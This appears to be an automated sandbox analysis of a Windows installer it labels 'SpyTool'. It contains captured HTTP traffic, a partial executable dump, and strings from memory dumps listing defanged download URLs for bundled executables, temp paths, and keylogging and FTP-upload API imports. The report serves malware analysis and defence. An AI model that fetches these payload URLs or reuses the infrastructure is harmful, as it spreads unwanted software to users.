Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 59213
Connection: keep-alive
Date: Thu, 27 Aug 2015 02:50:12 GMT
Last-Modified: Wed, 26 Aug 2015 15:24:15 GMT
ETag: "ad3ce40da858a76f235974af46c18365"
Accept-Ranges: bytes
Server: AmazonS3
Age: 82744
X-Cache: Hit from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hV4eTiJxA1GZYRgQhVPavmFWw76jIRgozWb7-_GuvZ9W1pwOL14mGQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................`...............................................t.......P...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...`...............................rsrc........P.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Sun, 06 Sep 2015 22:58:37 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 22:16:55 GMT
Connection: keep-alive
ETag: "55567057-f21d"
Accept-Ranges: bytes
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:59 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=C279EF6B66154A66BFF80ABC380EC9BE; expires=Fri, 04 Mar 16 22:58:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=C279EF6B66154A66BFF80ABC380EC9BE,1441580339.9876; expires=Fri, 04 Mar 16 22:58:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 3033805887
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010082-gmsd_re_005010082
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 388
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:06 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26780
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1441580346; expires=Fri, 31 Dec 15 16:45:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1441580346384969; path=/; expires=Tue, 06-Oct-15 22:59:06 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40536
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds035.am4.c
<<< skipped >>>
Map
The SpyTool connects to the servers at the following location(s):
Strings from Dumps
nskA.tmp_1676:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc43.tmp
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl10.tmp\inetc.dll
hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
33/este/re/setup_gmsd_re.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
/password
Uploading %s
@.reloc
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
MSVCRT.dll
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss44.tmp
nss44.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp /idn
Uninstall.exe
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nskA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
e/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
/este/re/setup_gmsd_re.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw13.tmp
dlgen.php?r=vu_vo2_
Nullsoft Install System v2.46
1.0.0.1
upgmsd_re_005010082.exe_380:
.text
`.rdata
@.data
.rsrc
@.reloc
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
CNotSupportedException
CCmdTarget
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CHttpConnection
CFtpConnection
CHttpFile
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
portuguese-brazilian
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
%%X
RegSetKeySecurity error! (rc=%lu)
Key not found.
Error opening key.
ntdll.dll
LookupPrivilegeValue error: %u
Error %d: Could not begin update of %s
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
PSAPI.DLL
GetProcessHeap
GetWindowsDirectoryW
GetCPInfo
KERNEL32.dll
GetKeyState
SetWindowsHookExW
CreateDialogIndirectParamW
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardState
GetKeyNameTextW
MapVirtualKeyExW
EnumChildWindows
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegSetKeySecurity
RegDeleteKeyW
RegEnumKeyExW
RegQueryInfoKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
UrlUnescapeW
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEACC.dll
InternetCrackUrlW
HttpOpenRequestW
HttpSendRequestW
HttpQueryInfoW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpEndRequestW
HttpSendRequestExW
FtpOpenFileW
FtpCommandW
FtpFindFirstFileW
InternetOpenUrlW
WININET.dll
GdiplusShutdown
gdiplus.dll
IMM32.dll
WINMM.dll